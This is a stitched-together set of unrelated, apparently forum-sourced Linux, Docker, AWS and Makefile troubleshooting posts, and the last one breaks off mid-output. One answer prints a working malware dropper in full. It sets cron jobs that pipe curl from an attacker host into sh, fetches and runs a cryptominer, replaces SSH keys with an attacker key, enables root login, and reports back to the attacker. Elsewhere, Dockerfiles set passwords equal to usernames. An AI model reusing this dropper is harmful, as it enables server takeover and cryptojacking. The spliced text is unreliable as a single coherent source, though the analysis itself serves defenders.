I recently inherited a build server that was running fine until last week; now I'm getting "file not found" errors. I am building as the non-root user "rpmbuilder". When I run my build command I get the following errors:
$ rpmbuild -bb -v rpmbuild/SPECS/mist.spec
Executing(%prep): /bin/sh -e /var/tmp/rpm-tmp.fUrkkG
Executing(%install): /bin/sh -e /var/tmp/rpm-tmp.edkQrN
Processing files: mist-2.0.2-1.x86_64
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/config.pyc
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/mist_db.sql
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/.password_complexity.conf
RPM build errors:
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/config.pyc
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/mist_db.sql
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/.password_complexity.conf
I used to get a ton of output under %prep, but now there's nothing. I tried running %setup without -q and still get the same output.
As far as I can tell my source files are still where they should be:
[rpmbuilder@coams-db SOURCES]$ pwd
/home/rpmbuilder/rpmbuild/SOURCES
[rpmbuilder@coams-db SOURCES]$ ls -la
total 66124
drwxr-xr-x. 3 rpmbuilder rpmbuilder 4096 Jun 23 10:08 .
drwxr-xr-x. 8 rpmbuilder rpmbuilder 4096 Feb 25 2016 ..
drwxrwxr-x. 8 rpmbuilder rpmbuilder 4096 Jun 23 10:08 mist-2.0.2
-rw-rw-r--. 1 rpmbuilder rpmbuilder 67681925 Jun 23 10:09 mist-2.0.2.tar.gz
Has anyone seen this issue before? Are there some nitpicky things I didn't know to check? Like I said I don't recall changing anything but who knows...
My spec file is below:
Name: mist
Version: 2.0.2
Release: 1
Summary: <snip>
Group: <snip>
License: GPL
URL: http://<snip>
Source0: mist-2.0.2.tar.gz
BuildArch: x86_64
BuildRoot: /home/rpmbuilder/rpmbuild/%{name}-%{version}
Requires(pre): shadow-utils
Requires: python, mysql-server, python-sqlalchemy, MySQL-python, python-requests, python-lxml, pytz, python-jsonschema
%description
Installs the MIST application.
%pre
if [ $1 = 1 ]; then
getent group mist > /dev/null || groupadd -r mist
getent passwd mist > /dev/null || useradd -r -g mist -d /opt/mist -c "MIST Console User" mist -p '<snip>'
# echo "Starting Cron Setup........."
#echo "Create temp file to hold current cron data"
#%define tempFile `mktemp`
#store temp file name
#TEMP_FILE_NAME=%{tempFile}
#echo "Storing crontab current data in temp file %{tempFile}"
#CRON_OUT_FILE=`crontab -l > $TEMP_FILE_NAME`
#echo "Add required cron details in cron temp file"
#ADD_TO_CRON=`echo "#Schedule the following cron job to <snip>:" >> $TEMP_FILE_NAME`
#Replace the http://servername.com/file.php with file path or link
#ADD_TO_CRON=`echo "*/30 * * * * python /opt/mist/assets/pull_assets.py > /dev/null 2>&1" >> $TEMP_FILE_NAME`
#echo "Storing temp cron to the crontab"
#ADD_TEMP_TO_CRON=`crontab $TEMP_FILE_NAME`
#echo "Remove %{tempFile} temp file"
#rm -r -f $TEMP_FILE_NAME
#get current crontab list for email
#%define cronDataNow `crontab -l`
#exit 0
fi
if [ $1 = 2 ]; then
/sbin/service mist stop
#cp -r /opt/mist/frontend/server/conf /opt
#rm -rf /opt/mist/frontend/server/work
fi
%preun
if [ $1 = 0 ]; then
/sbin/service mist stop
fi
%prep
%setup -q
%install
# rm -rf "$RPM_BUILD_ROOT"
echo $RPM_BUILD_ROOT
mkdir -p "$RPM_BUILD_ROOT/opt/mist"
cp -R . "$RPM_BUILD_ROOT/opt/mist"
mkdir -p "$RPM_BUILD_ROOT/var/log/MIST"
exit 0
%files
%attr(750,mist,mist) /opt/mist
%attr(400,mist,mist) /opt/mist/database/config.pyc
%attr(640,mist,mist) /opt/mist/database/mist_db.sql
%attr(640,mist,mist) /opt/mist/database/.password_complexity.conf
#/opt/mist
%doc
%post
if [ $1 = 1 ]; then
mv /opt/mist/mist_base/mist /etc/init.d
chmod 755 /etc/init.d/mist
chkconfig --level 345 mist on
mv /opt/mist/database/my.cnf /etc
/usr/sbin/usermod -a -G mist mysql
/usr/sbin/setsebool allow_user_mysql_connect 1
/bin/mkdir -p /var/log/MIST/frontend
chown -R root.mist /var/log/MIST
chmod -R 775 /var/log/MIST
fi
if [ $1 = 2 ]; then
#cp -r /opt/conf /opt/mist/frontend/server
#rm -r /opt/conf
#rm /opt/mist/frontend/mist
if [ -d /opt/mist/frontend ]; then
rm -rf /opt/mist/frontend
fi
mv /opt/mist/mist_base/mist /etc/init.d
rm /opt/mist/database/my.cnf
/sbin/service mist start
fi
mv /opt/mist/mist_logging.py /usr/lib/python2.6/site-packages
chmod 644 /usr/lib/python2.6/site-packages/mist_logging.py
%postun
if [ $1 = 0 ]; then
/bin/rm -r /opt/mist
chkconfig --del mist
/bin/rm /etc/init.d/mist
/bin/rm /etc/my.cnf
/bin/rm /usr/lib/python2.6/site-packages/mist_logging.py
/bin/rm -r /var/log/MIST
/usr/sbin/userdel --force mist 2> /dev/null; true
/usr/sbin/groupdel mist
/sbin/service mysqld stop
/bin/rm -r /var/lib/mysql
/bin/sed -i '/mistDB/d' /etc/hosts
#/usr/bin/crontab -l | grep -v "#Schedule the following cron job to <snip>:" | /usr/bin/crontab -
#/usr/bin/crontab -l | grep -v "python /opt/mist/assets/pull_assets.py" | /usr/bin/crontab -
fi
%changelog
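As an aside, the getent-guarded group creation in the %pre section above is a sound idempotency pattern. A standalone sketch of it (the probe group name below is hypothetical, and groupadd is replaced with an echo so this is safe to run unprivileged):

```shell
#!/bin/sh
# Only create the group if getent cannot already resolve it,
# mirroring the "getent group mist > /dev/null || groupadd -r mist" line.
ensure_group() {
    if getent group "$1" > /dev/null; then
        echo "group $1 already exists"
    else
        echo "would run: groupadd -r $1"
    fi
}
ensure_group root                 # present on virtually every Linux system
ensure_group no_such_group_xyz    # hypothetical missing group
```

Because getent queries NSS rather than parsing /etc/group directly, the guard also works when accounts come from LDAP or another directory service.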
I'm trying to create a Dockerfile that reads some URLs from an online file, but when I try to use wget with the URL in a variable, it fails. If I print the variables in a console message, the result is the correct URLs.
If the variables are declared with ENV or initialized with the URL, I have no problem using them in the wget; the problem only happens when reading the URLs from a file.
FROM openjdk:8
USER root
RUN mkdir /opt/tools /aplicaciones /deployments \
&& wget -q "www.url_online_file.com" -O url.txt \
&& while IFS== read -r name url; do if [ $name = "url1" ]; then export URL1=$url; fi; if [ $name = "url2" ]; then export URL2=$url; fi; done < url.txt \
&& echo "DEBUG URL1=$URL1"; echo "DEBUG URL2=$URL2"; \
&& wget -q $URL1 -O url1.zip
Error:
DEBUG URL1=www.prueba1.com
DEBUG URL2=www.prueba2.com
The command '/bin/sh -c mkdir /opt/tools /aplicaciones /deployments && wget -q "www.url_online_file.com" -O url.txt && while IFS== read -r name url; do if [ $name = "url1" ]; then export URL1=$url; fi; if [ $name = "url2" ]; then export URL2=$url; fi; done < url.txt && echo "DEBUG URL1=$URL1"; echo "DEBUG URL2=$URL2"; && wget -q $URL1 -O url1.zip' returned a non-zero code: 8
The structure of the online file is:
url1=www.prueba1.com
url2=www.prueba2.com
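For what it's worth, the `while IFS== read` loop itself does handle this format; a standalone sketch outside Docker (the temp file stands in for the downloaded url.txt):

```shell
#!/bin/sh
# Reproduce the name=url parsing from the RUN line against a local file.
tmp=$(mktemp)
printf 'url1=www.prueba1.com\nurl2=www.prueba2.com\n' > "$tmp"
while IFS='=' read -r name url; do
    if [ "$name" = "url1" ]; then URL1=$url; fi
    if [ "$name" = "url2" ]; then URL2=$url; fi
done < "$tmp"
echo "URL1=$URL1"    # → URL1=www.prueba1.com
echo "URL2=$URL2"    # → URL2=www.prueba2.com
rm -f "$tmp"
```

Note that wget exit code 8 means "server issued an error response", which is consistent with the URLs being parsed correctly but the download itself failing.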
The solution was to use wget -i with www.url_online_file.com and to modify the content of the file to:
www.prueba1.com
www.prueba2.com
The dockerfile:
FROM openjdk:8
USER root
RUN mkdir /opt/tools /aplicaciones /deployments \
&& wget -i "www.url_online_file.com" \
&& rm url* \
&& mv url1* url1.zip \
&& mv url2* url2.zip \
&& unzip url1.zip -d /opt/tools \
&& unzip url2.zip -d /opt/tools \
&& rm url1.zip \
&& rm url2.zip
I'm having trouble making a bash script run when adding it to the user data on an EC2 launch template. I've looked at suggestions and tried multiple approaches, including AWS's suggestion of using MIME multi-part in the script. I tried the #cloud-boothook directive, but it only runs parts of my script on boot. The interesting part is that once the instance is booted I can run the script successfully by invoking it manually from /var/lib/cloud/instances/<instance-id>/user-data.txt. I'm not sure what else to try, so any help is appreciated. Below is my script.
#cloud-boothook
#!/bin/bash
apt-get update
pip install -I ansible==2.6.2
cd /tmp
wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
tar -xvf go1.11.linux-amd64.tar.gz
mv go /usr/lib
apt-get -y install checkinstall build-essential
apt-get -y install libreadline6-dev libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev
cd /tmp
wget https://www.python.org/ftp/python/2.7.15/Python-2.7.15.tgz
tar -xvf Python-2.7.15.tgz
cd Python-2.7.15
./configure --prefix=/opt/python27myapp --enable-shared --enable-optimizations LDFLAGS=-Wl,-rpath=/opt/python27myapp/lib
make
checkinstall --pkgname=python27myapp --pkgversion=2.7.15 --pkgrelease=0 --nodoc --default make install
cd /tmp
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
/opt/python27myapp/bin/python /tmp/get-pip.py
/opt/python27myapp/bin/pip install --progress-bar=off virtualenv
set -euo pipefail
DEPLOYER="myapp"
PYTHON_DIST_PACKAGES="/usr/lib/python2.7/dist-packages"
PYTHON_SITE_PACKAGES="lib/python2.7/site-packages"
ANSIBLE_VENV_PATH="/mnt/ansible-12f"
ANSIBLE_USER="ansible"
ANSIBLE_VERSION="2.6.2.0"
ANSIBLE_USER_HOME="/home/${ANSIBLE_USER}"
TF_PLAYBOOK_REPO="git@github.com:myorg/${DEPLOYER}.git"
TF_PLAYBOOK_GITREF="2019.8.0"
TF_PLAYBOOK_OPTIONS="" # perhaps -vvvv
TF_PLAYBOOK_PATH="playbooks/twelve_factor/deploy.yml"
TF_APP_CONFIG_JSON="extra-vars.json"
TF_SCRATCH_DIR=$(mktemp -d -t tmp.XXXXXXXXXX)
TF_APP_CONFIG_PATH="${TF_SCRATCH_DIR}/config"
TF_ENVIRONMENT=""
EC2_INSTANCE_TAGS=""
CONFIG_BUCKET="databag-versions"
REGION=$(curl -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -c -r .region)
app_user="myapp"
git-with-ssm-key()
{
ssm_key="git_checkout_key"; shift
ssh-agent bash -o pipefail -c '
if aws ssm get-parameters \
--region "'$REGION'" \
--names "'$ssm_key'" \
--with-decryption \
--output text \
--query Parameters[0].Value |
ssh-add -k -
then
git "$@"
else
echo >&2 "ERROR: Failed to get or add key: '$ssm_key'"
exit 1
fi
' bash "$@"
}
#ssh-keyscan github.com >> ~/.ssh/known_hosts
# ============================================================================
cleanup() {
rm -rf $TF_SCRATCH_DIR
}
final_steps() {
cleanup
}
trap final_steps EXIT
# ============================================================================
install_packages() {
apt-get -y install jq
}
check_for_aws_cli() {
if ! aws help 1> /dev/null 2>&1; then
apt-get -y install awscli
fi
if ! aws help 1> /dev/null 2>&1; then
echo "The aws cli is not installed." 1>&2
exit 1
fi
echo "Found: $(aws --version 2>&1)"
}
application_deployed() {
[ -e "$TF_APP_HOME/current" ];
}
set_tf_app_home() {
TF_APP_HOME="$(jq .deploy_env.deploy_to $TF_APP_CONFIG_PATH | sed -e 's/^"//' -e 's/"$//')"
}
set_ec2_instance_tags() {
# We grab the EC2 tags of this instance.
instance_id=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)
filters="Name=resource-id,Values=${instance_id}"
EC2_INSTANCE_TAGS=$(aws ec2 describe-tags --region $REGION --filters "${filters}" | jq .Tags)
}
set_tf_environment() {
# The tag whose Key is "Environment" has the Value we want. Strip leading/trailing quotes.
name=$(echo "$EC2_INSTANCE_TAGS" | jq '.[] | select(.Key == "Environment") | .Value')
TF_ENVIRONMENT=$(echo $name | sed -e 's/^"//' -e 's/"$//')
}
set_config_bucket() {
case "$TF_ENVIRONMENT" in
innovate|production|bolt|operations|blackhat)
CONFIG_BUCKET="databag-versions"
;;
*)
CONFIG_BUCKET="databag-dev"
;;
esac
}
retrieve_configuration_source() {
# The tag whose Key is "Name" has the Value we want. Strip leading/trailing quotes.
selectName='.[] | select(.Key == "Name") | .Value'
name=$(echo "$EC2_INSTANCE_TAGS" | jq "$selectName" | sed -e 's/^"//' -e 's/"$//')
s3key="databags/$(echo $name | sed -e 's;-;/;g')"
aws s3 cp s3://${CONFIG_BUCKET}/${s3key} ${TF_APP_CONFIG_PATH}
set_git_ssh_key
set_tf_app_home
}
install_python() {
apt-get -y install python
pip install virtualenv
virtualenv $ANSIBLE_VENV_PATH
}
install_ansible() {
source ${ANSIBLE_VENV_PATH}/bin/activate
pip install ansible==${ANSIBLE_VERSION}
echo "$PYTHON_DIST_PACKAGES" > "${ANSIBLE_VENV_PATH}/${PYTHON_SITE_PACKAGES}/dist-packages.pth"
# This will go wrong if the system python path changes.
if [ ! -d "$PYTHON_DIST_PACKAGES" ]; then
echo "ERROR: the system python packages location does not exist: $PYTHON_DIST_PACKAGES"
exit 1
fi
# Having established a link between our virtualenv and the system python, we
# can now install python-apt.
pip install python-apt
}
add_playbook_user() {
if ! getent group $ANSIBLE_USER > /dev/null 2>&1; then
addgroup --system $ANSIBLE_USER
fi
if ! id -u $ANSIBLE_USER > /dev/null 2>&1; then
adduser --system --home $ANSIBLE_USER_HOME --shell /bin/false \
--ingroup $ANSIBLE_USER --disabled-password \
--gecos GECOS \
$ANSIBLE_USER
fi
if [ ! -d "$ANSIBLE_USER_HOME/.ssh" ]; then
mkdir $ANSIBLE_USER_HOME/.ssh
fi
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh
chmod 700 $ANSIBLE_USER_HOME/.ssh
echo "StrictHostKeyChecking no" > $ANSIBLE_USER_HOME/.ssh/config
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh/config
# echo ${GIT_SSH_KEY} > $ANSIBLE_USER_HOME/.ssh/id_rsa
echo $GIT_SSH_KEY | sed -e "s/-----BEGIN RSA PRIVATE KEY-----/&\n/" -e "s/-----END RSA PRIVATE KEY-----/\n&/" -e "s/\S\{64\}/&\n/g" > $ANSIBLE_USER_HOME/.ssh/id_rsa
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh/id_rsa
chmod 600 $ANSIBLE_USER_HOME/.ssh/id_rsa
if ! getent group $app_user > /dev/null 2>&1; then
addgroup --system $app_user
fi
if ! id -u $app_user > /dev/null 2>&1; then
adduser --system --home ${ANSIBLE_USER_HOME}/myapp --shell /bin/false \
--ingroup $app_user --disabled-password \
--gecos GECOS \
$app_user
fi
}
retrieve_playbook() {
rm -rf "${ANSIBLE_USER_HOME}/${DEPLOYER}"
(
cd "${ANSIBLE_USER_HOME}"
git-with-ssm-key /githubsshkeys/gitreader clone --branch "$TF_PLAYBOOK_GITREF" "$TF_PLAYBOOK_REPO"
)
chown -R ansible:ansible "${ANSIBLE_USER_HOME}/${DEPLOYER}"
}
patch_playbooks() {
awk '/^- name:/ {f=0} /^- name: Establish SSH credentials/ {f=1} !f;' ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app_user.yml > /tmp/temp_app_user.yml
cp /tmp/temp_app_user.yml ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app_user.yml # temp file is necessary since awk can't edit in-place
# remove the 'singleton' run operation... this isn't a singleton, and the playbook fails on the check to determine that.
sed -i 's/^.*singleton.*$//' ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app.yml
# fix the "invalid ioctl" warning, which is non-breaking but creates ugly warnings in the log
sed -i -e 's/mesg n .*true/tty -s \&\& mesg n/g' /root/.profile
# fix myapp user permissions in the /mnt/ansible-12f directories
chown -R myapp:myapp ${ANSIBLE_VENV_PATH}
# set up proper git SSH access for the ansible user
echo -e "host github.com\n HostName github.com\n IdentityFile ~/.ssh/id_rsa\n User git" >> $ANSIBLE_USER_HOME/.ssh/config
# set up the same git access for the myapp user
if [ ! -d "/mnt/myapp/.ssh" ]; then
mkdir -p /mnt/myapp/.ssh
fi
# ensure the directory will have the right permissions
mkdir -p /mnt/myapp/releases
cp ${ANSIBLE_USER_HOME}/.ssh/* /mnt/myapp/.ssh
chown -R ${app_user}:${app_user} /mnt/myapp
}
set_git_ssh_key() {
GIT_SSH_KEY="$(aws ssm get-parameters --region $REGION --names git_checkout_key --with-decryption --query Parameters[0].Value --output text)"
ssh-keyscan github.com >> ~/.ssh/known_hosts
}
write_inventory() {
IP_ADDRESS=$(curl -s http://169.254.169.254/latest/meta-data/local-ipv4)
cat - <<END_INVENTORY | sed -e 's/^ *//' > "${ANSIBLE_USER_HOME}/inventory"
[${IP_ADDRESS}]
${IP_ADDRESS} ansible_python_interpreter=${ANSIBLE_VENV_PATH}/bin/python
[linux]
${IP_ADDRESS}
# This bizarre group name will never be used anywhere.
# We need another group with an entry in it to avoid triggering
# the cmd_singleton section.
[12345_xx_%%%%_xxxx_]
10.10.10.10
END_INVENTORY
}
# Located in the directory in which ansible-playbook is executed; it is
# automatically picked up as Ansible runs.
write_ansible_settings() {
cat - <<END_SETTINGS | sed -e 's/^ *//' > "${ANSIBLE_USER_HOME}/ansible.cfg"
[defaults]
inventory = /etc/ansible/hosts
library = /usr/local/opt/ansible/libexec/lib/python2.7/site-packages/ansible/modules
remote_tmp = /tmp/.ansible-${USER}/tmp
pattern = *
forks = 5
poll_interval = 15
transport = smart
gathering = implicit
host_key_checking = False
# SSH timeout
timeout = 30
# we ssh as user medidata, becoming the 12-factor user, so:
# see https://docs.ansible.com/ansible/become.html#becoming-an-unprivileged-user
allow_world_readable_tmpfiles = True
ansible_managed = Ansible managed: {file} modified on %Y-%m-%d %H:%M:%S by {uid} on {host}
action_plugins = /usr/share/ansible_plugins/action_plugins
callback_plugins = /usr/share/ansible_plugins/callback_plugins
connection_plugins = /usr/share/ansible_plugins/connection_plugins
lookup_plugins = /usr/share/ansible_plugins/lookup_plugins
vars_plugins = /usr/share/ansible_plugins/vars_plugins
filter_plugins = /usr/share/ansible_plugins/filter_plugins
fact_caching = memory
retry_files_enabled = False
[ssh_connection]
# We have sometimes an error raised: Timeout (32s) waiting for privilege escalation prompt
# To avoid this, we make multiple attempts at the connection:
retries = 5
ssh_args = -o ControlMaster=auto -o ControlPersist=60s -o ServerAliveInterval=120
control_path = %(directory)s/%%h-%%r
pipelining = False
END_SETTINGS
}
write_deployment_config() {
cat - <<END_SETTINGS > "${ANSIBLE_USER_HOME}/${TF_APP_CONFIG_JSON}"
END_SETTINGS
}
run_deployment() {
write_inventory
write_ansible_settings
write_deployment_config
(
cd ${ANSIBLE_USER_HOME}
ansible-playbook "${DEPLOYER}/${TF_PLAYBOOK_PATH}" \
-i ${ANSIBLE_USER_HOME}/inventory \
"${DEPLOYER}/${TF_PLAYBOOK_PATH}" \
--connection=local \
--extra-vars @${TF_APP_CONFIG_PATH}
2> /tmp/ansible.err | tee /tmp/ansible.out
)
}
# -----------------------------------------------------
# ---------------- Script Starts Here -----------------
# -----------------------------------------------------
install_packages # do we need to check if packages already installed?
check_for_aws_cli
set_ec2_instance_tags
set_tf_environment
retrieve_configuration_source
if application_deployed; then
echo "Application already deployed; taking no action"
else
add_playbook_user
install_python
install_ansible
retrieve_playbook
patch_playbooks
run_deployment
fi
chown -R ${app_user}:${app_user} /mnt/myapp/services
chown -R ${app_user}:${app_user} /etc/sv/myapp*
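One subtlety worth isolating from the git-with-ssm-key function above is the argument-forwarding idiom bash -c '...' bash "$@": the word after the script body fills $0 inside the inner shell, and the remaining words become its positional parameters. A minimal sketch of just that mechanism:

```shell
#!/bin/bash
# Forward a function's arguments into an inner `bash -c` script.
forward() {
    # "inner" fills $0 of the -c script; the outer "$@" becomes $1, $2, ...
    bash -c 'printf "%s\n" "$@"' inner "$@"
}
forward one "two words" three
```

Getting this wrong (e.g. dropping the quotes around "$@") would re-split arguments containing spaces, which matters here because the function passes through arbitrary git arguments.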
I think you need to add sudo before every command.
Also, can you please share the error you are getting?
I solved the problem by removing set -euo pipefail in the script.
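For context, set -euo pipefail makes the shell abort at the first failing command (and on any reference to an unset variable), which in cloud-init user data can silently truncate the run partway through. A minimal illustration of the -e behaviour:

```shell
#!/bin/sh
# Under set -e the inner script exits at the first failing command,
# so "after" is never printed and the exit status is the failing command's.
sh -c 'set -e; false; echo after'
echo "inner exit status: $?"    # → inner exit status: 1
```

With set -u, referencing a variable before it has been assigned aborts the same way, so the placement of set -euo pipefail mid-script (after the pip/wget steps above) changes which failures are fatal.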
I am using AWS, and for the last couple of days I have been seeing some unnecessary scripts running. A screenshot is attached below.
I tried to kill the process with sudo kill -9 {pId} but was not able to do so.
Any suggestions?
Your box got compromised. It downloads a script to your server and runs it:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr
fi
# if [ ! -f "/opt/gg2lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
# chmod +x /opt/gg2lady
# fi
pkill gg2lady
yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
As you can see it deletes all ssh keys and creates a new one for the attackers to login.
At the end, the script reports its status back to the same server:
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
so the attackers can presumably keep track of all compromised servers in one place.
Edit:
The domain is registered in Panama. Whoopsie. I think you should check your server and get some advice on securing it.
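If you want to check a box for the specific artifacts this script drops, a quick sketch (the paths and strings are taken from the script above; extend as needed, and note a clean result does not prove the machine is safe):

```shell
#!/bin/sh
# Look for the files and cron/sshd entries installed by the script above.
found=0
for f in /root/.ssh/KHK75NEOiq /opt/yam/yam /opt/gg2lady; do
    if [ -e "$f" ]; then
        echo "suspicious file present: $f"
        found=1
    fi
done
# -q: quiet, -s: ignore missing files; matches in any listed file count.
if grep -qs "chanstring.com\|KHK75NEOiq" \
        /var/spool/cron/root /etc/crontab /etc/ssh/sshd_config; then
    echo "suspicious entry found in cron or sshd config"
    found=1
fi
if [ "$found" -eq 0 ]; then echo "no known indicators found"; fi
```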
In the Dockerfile below, I am only able to give the first user read, write, and execute access to the export folder:
...
VOLUME ["/export/"]
RUN groupadd galaxy \
&& chgrp -R galaxy /export \
&& chmod -R 770 /export
RUN useradd dudleyk \
&& mkdir /home/dudleyk \
&& chown dudleyk:dudleyk /home/dudleyk \
&& addgroup dudleyk galaxy \
&& ln -s /export/ /home/dudleyk/ \
&& echo "dudleyk:dudleyk" | chpasswd
RUN useradd lorencm \
&& mkdir /home/lorencm \
&& chown lorencm:lorencm /home/lorencm \
&& addgroup lorencm galaxy \
&& ln -s /export/ /home/lorencm/ \
&& echo "lorencm:lorencm" | chpasswd
EXPOSE 8787
CMD ["/init"]
I logged in to the docker container with docker run -it -v /home/galaxy:/export rstudio bash and it showed me the following:
ls -ahl
drwxr-xr-x 43 dudleyk galaxy 4.0K Apr 8 00:09 export
How do I give the second user read, write, and execute access to /export?
Thank you in advance
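Note that the ls output above shows drwxr-xr-x, i.e. no group write at all: a bind mount (-v /home/galaxy:/export) takes the permissions of the host directory, overriding whatever chmod/chgrp ran at image build time. For any second group member to write there, the mounted directory itself needs group write, and ideally the setgid bit so new files inherit the group. A small sketch of the target permission scheme, simulated on a temp directory (the group layout is assumed, not taken from the image):

```shell
#!/bin/sh
# Simulate the shared /export directory with a temp dir:
# 2770 = setgid + rwx for owner and group, nothing for others.
share=$(mktemp -d)
chmod 2770 "$share"
touch "$share/from_first_user"
ls -ld "$share"          # mode column shows drwxrws---
stat -c '%a' "$share"    # → 2770
```

On the real volume this has to be applied to the mounted path at run time (or to /home/galaxy on the host), not only in the Dockerfile.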
First of all, I am not sure that what I am going to ask about is actually my problem. It may be something else entirely, so please don't hesitate to point that out. I think the place I went wrong is the clean target of my Makefile, but I could be wrong about that too.
Here is what happens: after running make clean and then make, a few targets whose resulting files were deleted during the clean don't rebuild. (In addition to my question, I'd be interested in a way to disable entirely all the caching GNU Make does; it has been a major pain for as long as I've used it, and has never once had any positive consequences.)
If I then run make again, some of the targets are rebuilt. If I run make one more time, the targets that depend on the targets built in the previous round are rebuilt, and so on.
Here's the corresponding Makefile section:
PACKAGE = i-iterate
DOCDST = ${PACKAGE}/docs
HTMLDOCDST = ${PACKAGE}/html-docs
DOCSRC = ${PACKAGE}/info
IC = makeinfo
ICO = --force
TEXI2HTML = texi2html
TEXI2HTMLO = --split section --use-nodes
HTML2WIKI = html2wiki
HTML2WIKIO = --dialect GoogleCode
TEXI = $(wildcard $(DOCSRC)/*.texi)
INFO = $(addprefix $(DOCDST)/,$(notdir $(TEXI:.texi=.info)))
WIKIDST = ../wiki
HTML = $(wildcard $(HTMLDOCDST)/*.html)
WIKI = $(addprefix $(WIKIDST)/,$(notdir $(HTML:.html=.wiki)))
$(DOCDST)/%.info: $(DOCSRC)/%.texi
echo "info builds: $<"
$(IC) $(ICO) -o $@ $<
$(TEXI2HTML) $(TEXI2HTMLO) $<
$(WIKIDST)/%.wiki: $(HTMLDOCDST)/%.html
$(HTML2WIKI) $(HTML2WIKIO) $< > $@
default: prepare $(INFO) move-html $(WIKI) rename-wiki byte-compile
cp -r lisp info Makefile README i-pkg.el ${PACKAGE}
prepare:
mkdir -p ${PACKAGE}
mkdir -p ${DOCDST}
mkdir -p ${HTMLDOCDST}
move-html:
$(shell [[ '0' -ne `find ./ -maxdepth 1 -name "*.html" | wc -l` ]] && \
mv -f *.html ${HTMLDOCDST}/)
rename-wiki:
$(shell cd ${WIKIDST} && rename 'i-iterate' 'Iterate' *.wiki)
$(shell find ${WIKIDST} -name "*.wiki" -exec sed -i \
's/\[i-iterate/\[Iterate/g;s/\.html\#/\#/g;s/</\</g;s/>/\>/g' \
'{}' \;)
byte-compile:
emacs -Q -L ./lisp -batch -f batch-byte-compile ./lisp/*.el
clean:
rm -f ./lisp/*.elc
rm -f ./*.html
rm -rf ${DOCDST}
rm -rf ${HTMLDOCDST}
rm -rf ${PACKAGE}
And here's the output:
First run
$ make
mkdir -p i-iterate
mkdir -p i-iterate/docs
mkdir -p i-iterate/html-docs
emacs -Q -L ./lisp -batch -f batch-byte-compile ./lisp/*.el
Wrote /home/wvxvw/Projects/i-iterate/trunk/lisp/i-iterate.elc
cp -r lisp info Makefile README i-pkg.el i-iterate
Second run
$ make
mkdir -p i-iterate
mkdir -p i-iterate/docs
mkdir -p i-iterate/html-docs
echo "info builds: i-iterate/info/i-iterate.texi"
